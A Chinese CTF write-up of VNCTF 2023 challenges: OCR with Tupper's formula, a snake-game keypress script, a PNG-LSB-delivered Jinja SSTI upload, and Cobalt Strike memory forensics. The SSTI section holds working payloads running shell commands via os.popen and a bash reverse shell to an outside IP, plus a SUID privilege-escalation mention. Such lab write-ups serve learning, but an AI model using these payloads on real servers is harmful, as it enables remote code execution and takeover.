验证码
hint:Tupper(塔珀自指公式)
给了一堆图片,组合起来应该就是Tupper公式中的k
利用python的OCR批量识别,我找到了两个库进行识别对比
import pytesseract
from PIL import Image
from numpy.core.defchararray import isdigit
for i in range(136):
path = str(i) + '.png'
text = pytesseract.image_to_string(Image.open(path)).replace('o', '0')
print("".join(list(filter(isdigit, text))), end='')
#这个库识别错了好多,效率比较慢
import ddddocr
ocr = ddddocr.DdddOcr()
for i in range(0,136):
with open('{}.png'.format(i), 'rb') as f:
img_bytes = f.read()
tmp = ocr.classification(img_bytes).replace('o','0')
print("".join(list(tmp)), end='')
#这个库只错了一个,效率也很高
找个tupper脚本,直接跑
import numpy as np
import matplotlib.pyplot as plt
def Tupper_self_referential_formula(k):
aa = np.zeros((17, 106))
def f(x, y):
y += k
a1 = 2 ** -(-17 * x - y % 17)
a2 = (y // 17) // a1
return 1 if a2 % 2 > 0.5 else 0
for y in range(17):
for x in range(106):
aa[y, x] = f(x, y)
return aa[:, ::-1]
k = 1594199391770250354455183081054802631580554590456781276981302978243348088576774816981145460077422136047780972200375212293357383685099969525103172039042888918139627966684645793042724447954308373948403404873262837470923601139156304668538304057819343713500158029312192443296076902692735780417298059011568971988619463802818660736654049870484193411780158317168232187100668526865378478661078082009408188033574841574337151898932291631715135266804518790328831268881702387643369637508117317249879868707531954723945940226278368605203277838681081840279552
aa = Tupper_self_referential_formula(k)
plt.figure(figsize=(15, 10))
plt.imshow(aa, origin='lower')
plt.gca().invert_xaxis()#x轴反方向反转
plt.show()
Snake on web
wasm逆向题
但可以用按键脚本跑
from pynput import keyboard
import time
control = keyboard.Controller()
while True:
# 蛇头朝向右边,起点随便
time.sleep(3)
control.press('s')
control.release('s')
time.sleep(0.05)
control.press('a')
control.release('a')
time.sleep(3)
control.press('s')
control.release('s')
time.sleep(0.05)
control.press('d')
control.release('d')
跑到100分就有flag
LSSTIB
打开靶机是用来上传png的,根据题目猜测是利用png的lsb解密后执行ssti
制作lsb的脚本
# -*- coding: utf-8 -*-
"""
Created on Sun May 19 11:20:05 2019
@author: Administrator
"""
from PIL import Image
def plus(string):
# Python zfill() 方法返回指定长度的字符串,原字符串右对齐,前面填充0。
return string.zfill(8)
def get_key(strr):
# 获取要隐藏的文件内容
with open(strr, "rb") as f:
s = f.read()
string = ""
for i in range(len(s)):
# 逐个字节将要隐藏的文件内容转换为二进制,并拼接起来
# 1.先用ord()函数将s的内容逐个转换为ascii码
# 2.使用bin()函数将十进制的ascii码转换为二进制
# 3.由于bin()函数转换二进制后,二进制字符串的前面会有"0b"来表示这个字符串是二进制形式,所以用replace()替换为空
# 4.又由于ascii码转换二进制后是七位,而正常情况下每个字符由8位二进制组成,所以使用自定义函数plus将其填充为8位
string = string+""+plus(bin(s[i]).replace('0b', ''))
# print(string)
return string
def mod(x, y):
return x % y
# str1为载体图片路径,str2为隐写文件,str3为加密图片保存的路径
def func(str1, str2, str3):
im = Image.open(str1)
# 获取图片的宽和高
width, height = im.size[0], im.size[1]
print("width:"+str(width))
print("height:"+str(height))
count = 0
# 获取需要隐藏的信息
key = get_key(str2)
keylen = len(key)
for h in range(height):
for w in range(width):
pixel = im.getpixel((w, h))
a = pixel[0]
b = pixel[1]
c = pixel[2]
if count == keylen:
break
# 下面的操作是将信息隐藏进去
# 分别将每个像素点的RGB值余2,这样可以去掉最低位的值
# 再从需要隐藏的信息中取出一位,转换为整型
# 两值相加,就把信息隐藏起来了
a = a-mod(a, 2)+int(key[count])
count += 1
if count == keylen:
im.putpixel((w, h), (a, b, c))
break
b = b-mod(b, 2)+int(key[count])
count += 1
if count == keylen:
im.putpixel((w, h), (a, b, c))
break
c = c-mod(c, 2)+int(key[count])
count += 1
if count == keylen:
im.putpixel((w, h), (a, b, c))
break
if count % 3 == 0:
im.putpixel((w, h), (a, b, c))
im.save(str3)
def main():
# 原图
old = "flag.png"
# 处理后输出的图片路径
new = "flag_encode.png"
# 需要隐藏的信息
enc = "a.txt"
func(old, enc, new)
if __name__ == '__main__':
main()
先做一张空白的png
from PIL import Image
x = y = 100
img = Image.new("RGB",(x,y))
for width in range(0,x):
for height in range(0,y):
img.putpixel((width,height),(255,255,255))
img.save('flag.png')
在a.txt写payload,运行脚本上传
{{ config.__class__.__init__.__globals__['os'].popen('ls /').read() }}
查看flag
{{ config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }}
反弹shell
{{config.__class__.__init__.__globals__['os'].popen('bash -c "bash -i >& /dev/tcp/xx.xxx.xxx.xxx/2333 0>&1"').read()}}
当前是普通用户
进行suid提权,先找有suid权限的二进制可执行文件
find有suid权限,新建一个文件夹
利用find提权
获取flag
来一把紧张刺激的CS
根据poc.py,需要找到异常进程名字,连接端口,地址,公钥
先用vol3分析一下,可知是win10镜像
根据题目提示可以利用cobaltstrike插件(插件地址:https://github.com/Immersive-Labs-Sec/volatility_plugins)
把数据放入脚本,跑出flag
import hashlib
welocome = """
Welcome to VNCTF 2023
Try your best to find the traces left by that man!
Note: Just fill in the information you find in the variables below,
and be careful not to bring extra spaces at the beginning and end.
"""
process_name: str = "dllhost.exe"
# name of the doubtable process
port: str = "8347"
# port of the connection
server_address: str = "20-2-3.c-t-f.v-n-tea-m.ltd"
# address of the remote server,just like a url
publickey: str = "b'0\x81\x9f0\r\x06\t*\x86H\x86\xf7\r\x01\x01\x01\x05\x00\x03\x81\x8d\x000\x81\x89\x02\x81\x81\x00\xaf(Z\xfb\x11\x1cH\xb0\xaf%\xa2\n\xe1\\\xd8\xb2,\xf61\xa4\xdf\xd1\x8c\x13\xb7\x19@3\xd9I\xef\xea)8D\xf7\x8c\xa8\x16\xcb\xbe\xe0\xe2{s\xbd.\x1f\x19\xdc\xf6Hp\xd7\xa3\x86t\xf8x%\x97\x12\xed\xa8\xeb\x98\xf4\x0e\xfe\xc7\xb3\x95 \xcf_\x9e\xf4\xc5V\xff\x97\x8dc2\xa3\xfe\x82\xd1\xc3\xcb\x1d\xf5\x9eG}\xf8\x16\xf8\x82\xf7X\xe0\xc0\xb9\xff\x19\xc5\x97\x0cX\xec\x12a \xb8\xf9`=\xe4\xb6#\xcc\x93:\x1a3\xad\xa5\x02\x03\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'"
# A string of hexadecimal,without "0x",in lowercase
hash_ans: str = hashlib.md5((process_name + port + server_address + publickey).encode()).hexdigest()
print("Your answer is: flag{" + hash_ans + "}")
Your answer is: flag{fca568a71cd9b0fd89980863d2212f2f}
标签:count,control,string,VNCTF2023,flag,复现,import,x00
From: https://www.cnblogs.com/carefree669/p/17154970.html